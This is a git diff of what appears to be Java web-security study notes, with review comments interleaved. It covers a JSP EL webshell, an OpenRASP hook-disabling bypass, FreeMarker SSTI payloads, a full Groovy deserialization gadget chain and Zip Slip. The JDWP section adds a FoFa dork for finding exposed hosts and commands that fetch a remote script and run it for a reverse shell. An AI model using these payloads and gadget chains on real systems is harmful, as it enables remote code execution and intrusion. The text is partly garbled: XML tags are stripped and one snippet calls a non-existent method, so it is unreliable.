Webshell(规避 <%) + +![image](https://user-images.githubusercontent.com/55024146/179147020-e4ce602e-640b-44ab-a431-2056677474b3.png) + +`el.jsp` + +``` +${Runtime.getRuntime().exec(header.cmd)} +``` +测试效果 + +![image](https://user-images.githubusercontent.com/55024146/179147643-956c3938-e89f-4368-b8cd-c54021aad5e3.png) + + + + + + + + + + diff --git a/javaee/rasp/README.md b/javaee/rasp/README.md new file mode 100644 index 00000000..81f82e03 --- /dev/null +++ b/javaee/rasp/README.md 
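Review bot: in javaee/jsp/README.md both XML snippets have lost their element tags, so neither can be copied into a project: the pom.xml block shows only `javax.el / javax.el-api / 2.2.4 / provided` without the `<dependency>`, `<groupId>`, `<artifactId>`, `<version>` and `<scope>` elements, and the .tld block shows `1.0 / ELTest / http://10.10.10.1:8080/ELTest / Exec / com.lab.ELTest / java.lang.String Exec(java.lang.String)` without `<taglib>`, `<function>`, `<name>`, `<function-class>` and `<function-signature>`. The same stripping hit the JSTL SSRF paragraph, where the tag being discussed (`<c:import>`) is gone and the sentence starts with a bare 标签提供了. The question 至于为什么得是静态方法? is answered only by a screenshot; state it in text: a function bound through a TLD `<function-signature>` is resolved to a public static method, so an instance method has no receiver the EL resolver could invoke. Minor: `classess` should be `classes`, and the `${pageContext}` one-liner is fenced as java although it is EL inside a JSP.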
@@ -0,0 +1,124 @@ +前置基础 +--- + +**简介** + +Runtime Application Self-protection (RASP) is a security technology that is built or linked into an application or application runtime environment, and is capable of controlling application execution and detecting and preventing real-time attacks. + +by Gartner + +**理解何为 自我保护** + +栗子(命令执行漏洞): + +WAF、IDS等的安全设备是基于 攻击特征 进行检测 & 拦截,非常依赖于规则(只能阻断已知漏洞攻击)。 + +而在RASP技术中,应用程序则清楚自己执行了哪些代码,调用了哪些Java API,执行了哪些命令,所以针对该类型的漏洞只需要在涉及的API之前插入防御逻辑即可(可以阻断未知漏洞)。 + +示例 - Java命令执行的调用栈 + +```bash +create:-1, ProcessImpl (java.lang) +:386, ProcessImpl (java.lang) +start:137, ProcessImpl (java.lang) +start:1029, ProcessBuilder (java.lang) +exec:620, Runtime (java.lang) +exec:450, Runtime (java.lang) +exec:347, Runtime (java.lang) +main:6, CE01 (CommandExecution.Runtime) +``` + +示例 - RASP防御本地系统命令执行检测代码 + +- https://github.com/javasec/javaweb-rasp + +```bash +/** + * RASP防御本地系统命令执行示例 + * Creator: yz + * Date: 2019年07月23日 + */ +public class LocalCommandHookHandler { + + private static final HookResult BLOCK_RESULT = new HookResult(THROW, new RASPHookException(cmdType)); + + /** + * 本地命令执行拦截模块,如果系统执行的CMD命令和请求参数完全一致则直接拦截 + * + * @param command 执行的系统命令 + * @param event Hook事件 + * @return Hook处理结果 + */ + public static HookResult processCommand(List command, MethodHookEvent event) { + String[] commands = command.toArray(new String[0]); + + // 如果当前线程中不包含HTTP请求则不需要检测 + if (event.hasRequest()) { + RASPHttpRequestContext context = event.getRASPContext(); + RASPCachedRequest cachedRequest = context.getCachedRequest(); + + // 检测当前请求是否需要经过安全模块检测和过滤且该模块是否是开启状态 + if (!context.mustFilter(cmdType)) { + return DEFAULT_HOOK_RESULT; + } + + Set cachedParameters = cachedRequest.getCachedParameter(); + + // 只过滤请求参数值,忽略请求参数名称,因为参数名出现命令执行的概率太低 + for (RASPCachedParameter parameterValue : cachedParameters) { + // 请求参数名称 + String key = parameterValue.getKey(); + + // 请求参数值 + String[] values = parameterValue.getValue(); + + // 请求参数出现的位置 + RASPParameterPosition position = 
parameterValue.getRaspAttackPosition(); + + // 遍历所有的参数值 + for (String value : values) { + if (StringUtils.isEmpty(value)) { + continue; + } + + // 遍历被执行的系统命令 + for (String cmd : commands) { + if (value.equals(cmd)) { + // 添加攻击日志记录 + context.addAttackInfo(new RASPAttackInfo(cmdType, key, commands, position, event, true)); + + return BLOCK_RESULT; + } + } + } + } + + } + + return DEFAULT_HOOK_RESULT; + } + +} +``` + +研究利用 +--- + +### OpenRASP 代码执行 Bypass +> by: potats0 + +- 原因:安全机制在性能消耗上的让步 +- 实现:通过代码执行反射开启"禁用所用hook点"的feature + +```java +try{ + Class clazz = Class.forName("com.baidu.openrasp.config.Config"); + Method m = clazz.getMethod("getConfig", null); + Object o = m.invoke(null, null); + Field disableHooksF = o.getClass().getDeclareField("disableHooks"); + disableHooksF.setAccessible(true); + disableHooksF.set(o, true); +}catch(Exception e){ + e.printStackTrace(); +} +``` diff --git a/javaee/template engine/freemarker/README.md b/javaee/template engine/freemarker/README.md new file mode 100644 index 00000000..c9904c01 --- /dev/null +++ b/javaee/template engine/freemarker/README.md @@ -0,0 +1,5 @@ +``` +<#assign value="freemarker.template.utility.Execute"?new()>${value("calc.exe")} + +<#assign value="freemarker.template.utility.ObjectConstructor"?new()>${value("java.lang.ProcessBuilder","calc.exe").start()} +``` diff --git a/javaee/template engine/groovy/README.md b/javaee/template engine/groovy/README.md new file mode 100644 index 00000000..bf6c8fee --- /dev/null +++ b/javaee/template engine/groovy/README.md 
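Review bot: in javaee/rasp/README.md the LocalCommandHookHandler excerpt is fenced as bash although it is Java, and it is lifted from javaweb-rasp without its imports or the definitions of `cmdType`, `DEFAULT_HOOK_RESULT`, `THROW` and the RASP* types, so it cannot compile on its own; either link the exact source file and label it a fragment, or cut it down to the `processCommand` comparison loop and say that is what was done. The OpenRASP bypass snippet contains a real defect: `o.getClass().getDeclareField("disableHooks")` is not a method of `java.lang.Class`, the name is `getDeclaredField`, so the code as pasted does not compile. The command-execution stack example also lost a frame name to HTML stripping: `:386, ProcessImpl (java.lang)` was `<init>:386`. Finally, the 原因 line for the bypass would be more useful to a defender if it also said what the example demonstrates: a global kill switch reachable through reflection from application code is a single point of failure for the whole hook set.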
@@ -0,0 +1,214 @@ +- 测试Grovvy 版本 v2.3.9 + + +### InvocationHandler 接口 + +![image-20211108103208739](source-analysis.assets/image-20211108103208739-16395903238381.png) + +#### AnnotationInvocationHandler 类 + +- 实现了InvocaHandler接口 + +![image-20211215232032453](source-analysis.assets/image-20211215232032453-16395903266652.png) + +##### 构造方法 AnnotationInvocationHandler + +- sun.reflect.annotation.AnnotationInvocationHandler#AnnotationInvocationHandler + - 参数 + - Annotation 类型 + - Map 类型 + +![image-20211215234351142](source-analysis.assets/image-20211215234351142-16395903291333.png) + +##### 成员方法 readObject + +- sun.reflect.annotation.AnnotationInvocationHandler#readObject + - 该方法被反序列化时一定会被调用 + +![image-20211215232209050](source-analysis.assets/image-20211215232209050-16395903359864.png) + +361行:执行了memberValues 属性的 entrySet 方法。 + +##### 属性 memberValues + +- sun.reflect.annotation.AnnotationInvocationHandler#memberValues + +#### ConversionHandler 类 + +- 实现了 InvocationHandler接口 + +![image-20211108103242423](source-analysis.assets/image-20211108103242423.png) + +##### 成员方法 invoke + +![image-20211108103517041](source-analysis.assets/image-20211108103517041.png) + +#### ConvertedClosure 类 + +- 这个类是一个通用的适配器,用来适配一个闭包到任意的Java接口 + +![image-20211108103833882](source-analysis.assets/image-20211108103833882.png) + +##### 成员方法 invokeCustom + +- org.codehaus.groovy.runtime.ConvertedClosure#invokeCustom + - ConvertedClosure的method参数必须等于触发动态代理时调用的方法名 + +![image-20211108103854979](source-analysis.assets/image-20211108103854979.png) + +### Closure 抽象类 + +![image-20211215233015850](source-analysis.assets/image-20211215233015850.png) + +#### MethodClosure 类 + +- org.codehaus.groovy.runtime.MethodClosure + - 使用一个闭包表示的一个类上的方法,这个方法可以在任何时候被调用 + +![image-20211214204856501](source-analysis.assets/image-20211214204856501.png) + +##### 成员方法 doCall + +- 通过方法 `InvokerHelper.invokeMethod()` 进行方法调用 + +```java +package groovy; + +import org.codehaus.groovy.runtime.MethodClosure; +import 
java.lang.reflect.InvocationTargetException; +import java.lang.reflect.Method; + +public class doCall { + public static void main(String[] args) throws NoSuchMethodException, InvocationTargetException, IllegalAccessException { + MethodClosure methodClosure = new MethodClosure(Runtime.getRuntime(), "exec"); + Method doCallM = MethodClosure.class.getDeclaredMethod("doCall", Object.class); + doCallM.setAccessible(true); + doCallM.invoke(methodClosure, "calc"); + } +} +``` + +可反射调用执行系统命令,如下图: + +![image-20211215225939460](source-analysis.assets/image-20211215225939460.png) + + + + + +前置知识 + +- Groovy执行命令的语法:`"command".execute()` + +- 当通过动态代理对象调用一个方法时候,该方法的调用就会被转发到实现InvocationHandler接口类的invoke方法来调用 + +- newProxyInstance方法的三个参数: + + - loader: 用哪个类加载器去加载代理对象 + - interfaces: 动态代理类需要实现的接口 + + - h: 动态代理方法在执行时,会调用h里面的invoke方法去执行 + + + +构造payload + +```java +// 对cmd字符串执行execute命令的闭包 +MethodClosure methodClosure = new MethodClosure(cmd,"execute"); +// 适配entrySet方法的ConvertedClosure闭包 +ConvertedClosure closure = new ConvertedClosure(methodClosure,"entrySet"); +// 创建动态代理 +Map mapProxy = (Map) Proxy.newProxyInstance(Groovy_entrySet.class.getClassLoader(), new Class< ?>[] { Map.class }, closure); +// 创建AnnotationInvocationHandler实例(通过反射) +Class clazz = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler"); +Constructor constructor = clazz.getDeclaredConstructors()[0]; +constructor.setAccessible(true); +Object annotationInvocationHandler = constructor.newInstance(Retention.class, mapProxy); +``` + +解释如下: + +当annotationInvocationHandler对象的序列化数据被反序列化时,会调用readObject() + +- readObject() 调用 memberValues.entrySet() + - ConversionHandler.Invoke() 调用 ConvertedClosure.invokeCustom() + - getDelegate()).call() 调用 getMetaClass().invokeMethod() // 递归调用 + - method.doMethodInvoke() 调用 ProcessGroovyMethods.execute() + - Runtime.getRuntime().exec() + +最终gadget如下 + +```java +import java.io.*; +import java.lang.reflect.Proxy; +import java.util.Map; +import java.lang.reflect.Constructor; 
+import java.lang.annotation.Retention; + +import org.codehaus.groovy.runtime.ConvertedClosure; +import org.codehaus.groovy.runtime.MethodClosure; + +public class Groovy_entrySet { + public static void main(String[] args){ + Groovy_entrySet.generatePayload("calc"); + } + public static void generatePayload(String cmd){ + try{ + MethodClosure methodClosure = new MethodClosure(cmd,"execute"); + ConvertedClosure closure = new ConvertedClosure(methodClosure,"entrySet"); + Map mapProxy = (Map) Proxy.newProxyInstance(Groovy_entrySet.class.getClassLoader(), new Class< ?>[] { Map.class }, closure); + Class clazz = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler"); + Constructor constructor = clazz.getDeclaredConstructors()[0]; + constructor.setAccessible(true); + Object annotationInvocationHandler = constructor.newInstance(Retention.class, mapProxy); + ByteArrayOutputStream byteArray = new ByteArrayOutputStream(); + ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArray); + objectOutputStream.writeObject(annotationInvocationHandler); + objectOutputStream.close(); + /** + * 笔记:打印字节数组 + * System.out.print(Arrays.toString(data)); + */ + byte[] data = byteArray.toByteArray(); + // 将字节数组反序列化为对象 + ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(data); + ObjectInputStream objectInputStream = new ObjectInputStream(byteArrayInputStream); + objectInputStream.readObject(); + objectInputStream.close(); + } catch (Exception e) { + e.printStackTrace(); + } + } +} +``` + +测试效果 + +![image-20211216014448682](source-analysis.assets/image-20211216014448682.png) + +调用栈 + +```java +execute:530, ProcessGroovyMethods (org.codehaus.groovy.runtime) +doMethodInvoke:-1, dgm748ドル (org.codehaus.groovy.runtime) +invokeMethod:1207, MetaClassImpl (groovy.lang) +invokeMethod:1074, MetaClassImpl (groovy.lang) +invokeMethod:1016, MetaClassImpl (groovy.lang) +call:423, Closure (groovy.lang) +invokeCustom:51, ConvertedClosure 
(org.codehaus.groovy.runtime) +invoke:103, ConversionHandler (org.codehaus.groovy.runtime) +entrySet:-1, $Proxy0 (com.sun.proxy) +readObject:452, AnnotationInvocationHandler (sun.reflect.annotation) +invoke0:-1, NativeMethodAccessorImpl (sun.reflect) +invoke:62, NativeMethodAccessorImpl (sun.reflect) +invoke:43, DelegatingMethodAccessorImpl (sun.reflect) +invoke:498, Method (java.lang.reflect) +invokeReadObject:1058, ObjectStreamClass (java.io) +readSerialData:2122, ObjectInputStream (java.io) +readOrdinaryObject:2013, ObjectInputStream (java.io) +readObject0:1535, ObjectInputStream (java.io) +readObject:422, ObjectInputStream (java.io) +generatePayload:37, Groovy_entrySet (groovy) +main:14, Groovy_entrySet (groovy) +``` diff --git a/javaee/template engine/groovy/source-analysis.assets/image-20211108103208739-16395903238381.png b/javaee/template engine/groovy/source-analysis.assets/image-20211108103208739-16395903238381.png new file mode 100644 index 00000000..b5c7d3ac Binary files /dev/null and b/javaee/template engine/groovy/source-analysis.assets/image-20211108103208739-16395903238381.png differ diff --git a/javaee/template engine/groovy/source-analysis.assets/image-20211108103242423.png b/javaee/template engine/groovy/source-analysis.assets/image-20211108103242423.png new file mode 100644 index 00000000..a7d9ecc8 Binary files /dev/null and b/javaee/template engine/groovy/source-analysis.assets/image-20211108103242423.png differ diff --git a/javaee/template engine/groovy/source-analysis.assets/image-20211108103517041.png b/javaee/template engine/groovy/source-analysis.assets/image-20211108103517041.png new file mode 100644 index 00000000..8481e47b Binary files /dev/null and b/javaee/template engine/groovy/source-analysis.assets/image-20211108103517041.png differ 
diff --git a/javaee/template engine/groovy/source-analysis.assets/image-20211108103833882.png b/javaee/template engine/groovy/source-analysis.assets/image-20211108103833882.png new file mode 100644 index 00000000..39188c3c Binary files /dev/null and b/javaee/template engine/groovy/source-analysis.assets/image-20211108103833882.png differ diff --git a/javaee/template engine/groovy/source-analysis.assets/image-20211108103854979.png b/javaee/template engine/groovy/source-analysis.assets/image-20211108103854979.png new file mode 100644 index 00000000..c84c0409 Binary files /dev/null and b/javaee/template engine/groovy/source-analysis.assets/image-20211108103854979.png differ diff --git a/javaee/template engine/groovy/source-analysis.assets/image-20211214204856501.png b/javaee/template engine/groovy/source-analysis.assets/image-20211214204856501.png new file mode 100644 index 00000000..5244a75b Binary files /dev/null and b/javaee/template engine/groovy/source-analysis.assets/image-20211214204856501.png differ diff --git a/javaee/template engine/groovy/source-analysis.assets/image-20211215225939460.png b/javaee/template engine/groovy/source-analysis.assets/image-20211215225939460.png new file mode 100644 index 00000000..5047c59b Binary files /dev/null and b/javaee/template engine/groovy/source-analysis.assets/image-20211215225939460.png differ diff --git a/javaee/template engine/groovy/source-analysis.assets/image-20211215232032453-16395903266652.png b/javaee/template engine/groovy/source-analysis.assets/image-20211215232032453-16395903266652.png new file mode 100644 index 00000000..7f5a7e38 Binary files /dev/null and b/javaee/template engine/groovy/source-analysis.assets/image-20211215232032453-16395903266652.png differ 
diff --git a/javaee/template engine/groovy/source-analysis.assets/image-20211215232209050-16395903359864.png b/javaee/template engine/groovy/source-analysis.assets/image-20211215232209050-16395903359864.png new file mode 100644 index 00000000..c9a50da6 Binary files /dev/null and b/javaee/template engine/groovy/source-analysis.assets/image-20211215232209050-16395903359864.png differ diff --git a/javaee/template engine/groovy/source-analysis.assets/image-20211215233015850.png b/javaee/template engine/groovy/source-analysis.assets/image-20211215233015850.png new file mode 100644 index 00000000..0b637089 Binary files /dev/null and b/javaee/template engine/groovy/source-analysis.assets/image-20211215233015850.png differ diff --git a/javaee/template engine/groovy/source-analysis.assets/image-20211215234351142-16395903291333.png b/javaee/template engine/groovy/source-analysis.assets/image-20211215234351142-16395903291333.png new file mode 100644 index 00000000..e0979db0 Binary files /dev/null and b/javaee/template engine/groovy/source-analysis.assets/image-20211215234351142-16395903291333.png differ diff --git a/javaee/template engine/groovy/source-analysis.assets/image-20211216014448682.png b/javaee/template engine/groovy/source-analysis.assets/image-20211216014448682.png new file mode 100644 index 00000000..ee4b5bce Binary files /dev/null and b/javaee/template engine/groovy/source-analysis.assets/image-20211216014448682.png differ diff --git a/javaee/template engine/velocity/README.md b/javaee/template engine/velocity/README.md new file mode 100644 index 00000000..dfbe607b --- /dev/null +++ b/javaee/template engine/velocity/README.md @@ -0,0 +1,2 @@ + +[0x02-模板引擎-velocity](https://pen4uin.github.io/post/22-10-01-confluence-ssti-via-velocity/#0x02-%E6%A8%A1%E6%9D%BF%E5%BC%95%E6%93%8E-velocity) diff --git a/javaee/vulnerability/README.md b/javaee/vulnerability/README.md new file mode 100644 index 00000000..77da955f --- /dev/null +++ b/javaee/vulnerability/README.md 
@@ -0,0 +1,319 @@ +## 基础篇 +### 系统属性 + +常与System.getProperty()、System.getProperties()方法搭配使用 + +``` +java.version Java 运行时环境版本 +java.vendor Java 运行时环境供应商 +java.vendor.url Java 供应商的 URL +java.vm.specification.version Java 虚拟机规范版本 +java.vm.specification.vendor Java 虚拟机规范供应商 +java.vm.specification.name Java 虚拟机规范名称 +java.vm.version Java 虚拟机实现版本 +java.vm.vendor Java 虚拟机实现供应商 +java.vm.name Java 虚拟机实现名称 +java.specification.version Java 运行时环境规范版本 +java.specification.vendor Java 运行时环境规范供应商 +java.specification.name Java 运行时环境规范名称 +os.name 操作系统的名称 +os.arch 操作系统的架构 +os.version 操作系统的版本 +file.separator 文件分隔符(在 UNIX 系统中是" / ") +path.separator 路径分隔符(在 UNIX 系统中是" : ") +line.separator 行分隔符(在 UNIX 系统中是" /n ") +java.home Java 安装目录 +java.class.version Java 类格式版本号 +java.class.path Java 类路径 +java.library.path 加载库时搜索的路径列表 +java.io.tmpdir 默认的临时文件路径 +java.compiler 要使用的 JIT 编译器的名称 +java.ext.dirs 一个或多个扩展目录的路径 +user.name 用户的账户名称 +user.home 用户的主目录 +user.dir 用户当前工作目录 +``` + +## 漏洞篇 + +### Command Execution 命令执行 + +Java下几种执行命令的方式 + +- java.lang.Runtime + - exec() + - load() +- java.lang.ProcessBuilder +- java.lang.ProcessImpl +- JNI(暂放) + +#### java.lang.Runtime + +##### exec() + +测试代码 + +```java +import java.io.IOException; + +public class CE01 { + public static void main(String[] args) throws IOException { + Runtime.getRuntime().exec("calc"); + } +} +``` + +测试效果 + +![image-20220119163614488](img/image-20220119163614488.png) + +调用栈 + +``` +create:-1, ProcessImpl (java.lang) +:386, ProcessImpl (java.lang) +start:137, ProcessImpl (java.lang) +start:1029, ProcessBuilder (java.lang) +exec:620, Runtime (java.lang) +exec:450, Runtime (java.lang) +exec:347, Runtime (java.lang) +main:6, CE01 (CommandExecution.Runtime) +``` + + + +##### load() + +- 加载动态链接库,如linux下的so文件,windows下的dll文件。 + +准备dll - 弹计算器 + +``` +msfvenom -p windows/x64/exec --platform win -a x64 CMD=calc.exe EXITFUNC=thread -f dll> calc.dll +``` + +![image-20211108002026565](img/image-20211108002026565.png) + +测试代码 + +```java +package 
CommandExecution.Runtime; + +public class CE00 { + public static void main(String[] args) { + Runtime rt = Runtime.getRuntime(); + rt.load("F:\\Java_Sec\\java\\java_vuln\\src\\main\\java\\CommandExecution\\Runtime\\calc.dll"); + } +} +``` + +测试效果 + +![image-20220120170955546](img/image-20220120170955546.png) + +#### java.lang.ProcessBuilder + +测试代码 + +```java +import java.io.IOException; + +public class CE02 { + public static void main(String[] args) throws IOException { + ProcessBuilder pb = new ProcessBuilder("calc"); + Process process = pb.start(); + System.out.println(process); + } +} +``` + +测试效果 + +![image-20220119164953772](img/image-20220119164953772.png) + +调用栈 + +```java +create:-1, ProcessImpl (java.lang) +:386, ProcessImpl (java.lang) +start:137, ProcessImpl (java.lang) +start:1029, ProcessBuilder (java.lang) +main:7, CE02 (CommandExecution.ProcessBuilder) +``` + +#### java.lang.ProcessImpl + +测试代码 + +```java +import java.lang.reflect.Method; +import java.util.Map; + +public class CE03 { + public static void main(String[] args) throws Exception{ + /** + * 反射调用 java.lang.ProcessImpl#start(java.lang.String[], java.util.Map, java.lang.String, java.lang.ProcessBuilder.Redirect[], boolean) + */ + Class clazz = Class.forName("java.lang.ProcessImpl"); + Method start = clazz.getDeclaredMethod("start", String[].class, Map.class, String.class, ProcessBuilder.Redirect[].class, boolean.class); + start.setAccessible(true); + start.invoke(null, new String[]{"calc"}, null, null, null, false); + } +} +``` + +测试效果 + +![image-20220120171337998](img/image-20220120171337998.png) + + + +调用栈 + +```java +create:-1, ProcessImpl (java.lang) +:386, ProcessImpl (java.lang) +start:137, ProcessImpl (java.lang) +invoke0:-1, NativeMethodAccessorImpl (sun.reflect) +invoke:62, NativeMethodAccessorImpl (sun.reflect) +invoke:43, DelegatingMethodAccessorImpl (sun.reflect) +invoke:498, Method (java.lang.reflect) +main:14, CE03 (CommandExecution.ProcessImpl) +``` + +#### JNI +(暂放) + +### 
Zip Slip + +#### zt-zip v1.1.12 + +测试环境 + +- https://github.com/cesarsotovalero/zip-slip-exploit-example + + +测试效果 + +> 正常压缩文件 + +normalCompressed.zip + + ![image-20220215152128829](img/image-20220215152128829.png) + +解压路径 + +``` +F:\Java_Sec\vuln_projects\zip-slip-demo\target\example\upload\flag.txt +``` + + + +> 恶意压缩文件 + +evilCompressed.zip + + ![image-20220215152156507](img/image-20220215152156507.png) + +payload + +``` +../../../../../../../../../../../../../../../../../../../../../../../../tmp/flag.txt +``` + +解压路径 + +``` +# 目录成功穿越到根目录 +F:\tmp\flag.txt +``` + + ![image-20220215152949881](img/image-20220215152949881.png) + + + +漏洞分析 + +![image-20220215153502354](img/image-20220215153502354.png) + +- 判断文件是否为 .zip 后缀 +- 调用 org.zeroturnaround.zip.ZipUtil#unpack 进行解压缩 + +调用栈 + +```java +process:1150, ZipUtil$Unpacker (org.zeroturnaround.zip) +iterate:508, ZipUtil (org.zeroturnaround.zip) +iterate:472, ZipUtil (org.zeroturnaround.zip) +unpack:996, ZipUtil (org.zeroturnaround.zip) +unpack:939, ZipUtil (org.zeroturnaround.zip) +doPost:56, UploadServlet (se.kth.servlet) +... 
+``` + +![image-20220215153915204](img/image-20220215153915204.png) + +- 执行到org.zeroturnaround.zip.ZipUtil.Unpacker#process方法,调用 java.util.zip.ZipEntry#getName 获取 entry 的 name + +- 与`outputDir` 进行拼接创建一个 File 实例 `file` + + - 未对获取到的路径进行校验 + + ![image-20220215155935625](img/image-20220215155935625.png) + +- 最后调用org.zeroturnaround.zip.commons.FileUtils#copy 将输入流复制到实例`file`(写入文件)。 + + + +漏洞修复 + +pom.xml + +```xml + + org.zeroturnaround + zt-zip + 1.13 + jar + +``` + + + +![image-20220215162206252](img/image-20220215162206252.png) + +在文件写入之前,进行了两处判断 + +- `name` 中是否出现了 `··` +- `file` 的规范路径名的前缀是否为 `outputDir` 的规范路径名 + - getCanonicalPath() + - 返回绝对唯一的标准规范路径名,即会删除路径中的 `.` 和 `..` 。 + - 会解析软链接(在UNIX平台上) + + + +> ps:感觉这里在Linux平台上可以利用 条件竞争 + 软链接 进行绕过(实战意义不大、积累思路) + + + + + + + +ref: + +- https://github.com/snyk/zip-slip-vulnerability +- https://github.com/cesarsotovalero/zip-slip-exploit-example + +### EL Injection + +- [01 Java表达式注入的武器化利用](https://yzddmr6.com/posts/java-expression-exploit/) + + + + + + + + + diff --git a/javaee/vulnerability/img/image-20211108002026565.png b/javaee/vulnerability/img/image-20211108002026565.png new file mode 100644 index 00000000..f3011482 Binary files /dev/null and b/javaee/vulnerability/img/image-20211108002026565.png differ diff --git a/javaee/vulnerability/img/image-20220119163614488.png b/javaee/vulnerability/img/image-20220119163614488.png new file mode 100644 index 00000000..0a20f4ae Binary files /dev/null and b/javaee/vulnerability/img/image-20220119163614488.png differ diff --git a/javaee/vulnerability/img/image-20220119164953772.png b/javaee/vulnerability/img/image-20220119164953772.png new file mode 100644 index 00000000..cee97597 Binary files /dev/null and b/javaee/vulnerability/img/image-20220119164953772.png differ 
diff --git a/javaee/vulnerability/img/image-20220119172348169.png b/javaee/vulnerability/img/image-20220119172348169.png new file mode 100644 index 00000000..7c6b7da7 Binary files /dev/null and b/javaee/vulnerability/img/image-20220119172348169.png differ diff --git a/javaee/vulnerability/img/image-20220120170955546.png b/javaee/vulnerability/img/image-20220120170955546.png new file mode 100644 index 00000000..1c2833f2 Binary files /dev/null and b/javaee/vulnerability/img/image-20220120170955546.png differ diff --git a/javaee/vulnerability/img/image-20220120171337998.png b/javaee/vulnerability/img/image-20220120171337998.png new file mode 100644 index 00000000..f3b44250 Binary files /dev/null and b/javaee/vulnerability/img/image-20220120171337998.png differ diff --git a/javaee/vulnerability/img/image-20220215152128829.png b/javaee/vulnerability/img/image-20220215152128829.png new file mode 100644 index 00000000..ae32dd31 Binary files /dev/null and b/javaee/vulnerability/img/image-20220215152128829.png differ diff --git a/javaee/vulnerability/img/image-20220215152156507.png b/javaee/vulnerability/img/image-20220215152156507.png new file mode 100644 index 00000000..c329cd13 Binary files /dev/null and b/javaee/vulnerability/img/image-20220215152156507.png differ diff --git a/javaee/vulnerability/img/image-20220215152949881.png b/javaee/vulnerability/img/image-20220215152949881.png new file mode 100644 index 00000000..18b4aa99 Binary files /dev/null and b/javaee/vulnerability/img/image-20220215152949881.png differ diff --git a/javaee/vulnerability/img/image-20220215153502354.png b/javaee/vulnerability/img/image-20220215153502354.png new file mode 100644 index 00000000..cb55460e Binary files /dev/null and b/javaee/vulnerability/img/image-20220215153502354.png differ 
diff --git a/javaee/vulnerability/img/image-20220215153915204.png b/javaee/vulnerability/img/image-20220215153915204.png new file mode 100644 index 00000000..2c816390 Binary files /dev/null and b/javaee/vulnerability/img/image-20220215153915204.png differ diff --git a/javaee/vulnerability/img/image-20220215154950054.png b/javaee/vulnerability/img/image-20220215154950054.png new file mode 100644 index 00000000..f5cbac70 Binary files /dev/null and b/javaee/vulnerability/img/image-20220215154950054.png differ diff --git a/javaee/vulnerability/img/image-20220215155935625.png b/javaee/vulnerability/img/image-20220215155935625.png new file mode 100644 index 00000000..0411c087 Binary files /dev/null and b/javaee/vulnerability/img/image-20220215155935625.png differ diff --git a/javaee/vulnerability/img/image-20220215162206252.png b/javaee/vulnerability/img/image-20220215162206252.png new file mode 100644 index 00000000..b4b31dea Binary files /dev/null and b/javaee/vulnerability/img/image-20220215162206252.png differ diff --git a/javaee/vulnerability/jdwp rce.md b/javaee/vulnerability/jdwp rce.md new file mode 100644 index 00000000..7a1c5adf --- /dev/null +++ b/javaee/vulnerability/jdwp rce.md 
@@ -0,0 +1,52 @@ +> Created:2021年10月17日 17:54 + +### 漏洞简介 +JDWP(Java DEbugger Wire Protocol):即Java调试线协议,是一个为Java调试而设计的通讯交互协议,它定义了调试器和被调试程序之间传递的信息的格式。说白了就是JVM或者类JVM的虚拟机都支持一种协议,通过该协议,Debugger 端可以和 target VM 通信,可以获取目标 VM的包括类、对象、线程等信息,在调试Android应用程序这一场景中,Debugger一般是指你的 develop machine 的某一支持 JDWP协议的工具例如 Android Studio 或者 JDB,而 Target JVM是指运行在你mobile设备当中的各个App(因为它们都是一个个虚拟机 Dalvik 或者 ART),JDWP Agent一般负责监听某一个端口,当有 Debugger向这一个端口发起请求的时候,Agent 就转发该请求给 target JVM并最终由该 JVM 来处理请求,并把 reply 信息返回给 Debugger 端。 + +### 漏洞复现 + +FoFa Dork: + +> banner="JDWP-Handshake" + + +![image](https://user-images.githubusercontent.com/55024146/161269239-6315e359-6e6e-475c-93ca-b15348ea4748.png) + + +``` +python2 .\jdwp-shellifier.py -t 62.x.x.x -p 8000 --cmd "ping xxxxx.dnslog.cn -c2" +``` + +![image](https://user-images.githubusercontent.com/55024146/161269453-16716b2d-b843-4d87-98e5-bf8d324d11fc.png) + +此时,找到相应WEB网站访问 + +![image](https://user-images.githubusercontent.com/55024146/161269588-3484b430-177c-4cb2-b367-abe3714c08e8.png) + +![image](https://user-images.githubusercontent.com/55024146/161269685-238b7aaa-879a-40cd-ba43-e75b807121d4.png) + +触发 + +![image](https://user-images.githubusercontent.com/55024146/161269779-ee51ae56-756d-4493-9c63-21d9d98b3356.png) + +测试截图 + +![image](https://user-images.githubusercontent.com/55024146/161269896-7a791529-aa51-4e57-9f72-27fc00edce47.png) + +### 漏洞利用 + +- 反弹shell + - jdwp-shellifier.py -t 目标IP -p 端口 --cmd "wget http://x.x.x.x/x.txt -O /tmp/x.sh" + - jdwp-shellifier.py -t 目标IP -p 端口 --cmd "bash /tmp/x.sh" + +- 写入webshell + +### 漏洞防御 + +- 关闭JDWP端口,或者JDWP端口不对公网开放 + - 所以内网渗透时可以注意一下 +_+ +- 关闭Java的debug模式(开启该模式对服务器性能有影响) + + +参考资料 +- https://github.com/IOActive/jdwp-shellifier diff --git a/mechanism/databinding/README.md b/mechanism/databinding/README.md new file mode 100644 index 00000000..106a9e0e --- /dev/null +++ b/mechanism/databinding/README.md 
@@ -0,0 +1,3 @@ +相关漏洞 +- [ ] Spring Framework CVE-2022-22965 +- [ ] Spring Framework CVE-2010-1622 \ No newline at end of file diff --git a/mechanism/serialization/fastjson/note/img/32e2b52cedb344d5be39ed880c30e134.png b/mechanism/serialization/fastjson/note/img/32e2b52cedb344d5be39ed880c30e134.png new file mode 100644 index 00000000..1d1034ce Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/32e2b52cedb344d5be39ed880c30e134.png differ diff --git a/mechanism/serialization/fastjson/note/img/41a2f918a49c41b7ac62521bafa778cb.png b/mechanism/serialization/fastjson/note/img/41a2f918a49c41b7ac62521bafa778cb.png new file mode 100644 index 00000000..3aad3daf Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/41a2f918a49c41b7ac62521bafa778cb.png differ diff --git a/mechanism/serialization/fastjson/note/img/4a81b196a3ef4e4b9e172a4a52e1acaf.png b/mechanism/serialization/fastjson/note/img/4a81b196a3ef4e4b9e172a4a52e1acaf.png new file mode 100644 index 00000000..a9f955eb Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/4a81b196a3ef4e4b9e172a4a52e1acaf.png differ diff --git a/mechanism/serialization/fastjson/note/img/851600c7f7064b3880112b15398e90cc.png b/mechanism/serialization/fastjson/note/img/851600c7f7064b3880112b15398e90cc.png new file mode 100644 index 00000000..6fd52650 Binary files /dev/null and 